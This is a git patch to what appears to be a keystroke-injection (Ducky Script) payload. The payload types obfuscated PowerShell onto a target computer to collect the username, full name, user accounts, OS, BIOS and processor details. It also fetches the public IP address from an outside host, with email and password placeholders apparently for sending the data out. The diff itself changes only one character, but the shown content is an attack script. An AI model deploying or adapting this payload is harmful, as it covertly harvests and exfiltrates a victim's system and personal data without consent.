From 767a357842b0592f95b9c44b893b09af566e646b Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sun, 14 May 2023 11:43:50 +0000 Subject: [PATCH] Update Email System & User Information.txt --- OSINT/Email System & User Information.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/OSINT/Email System & User Information.txt b/OSINT/Email System & User Information.txt index 55996c8..325d9b2 100644 --- a/OSINT/Email System & User Information.txt +++ b/OSINT/Email System & User Information.txt @@ -27,7 +27,7 @@ STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" REM main powershell code ENTER DELAY 100 -STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)"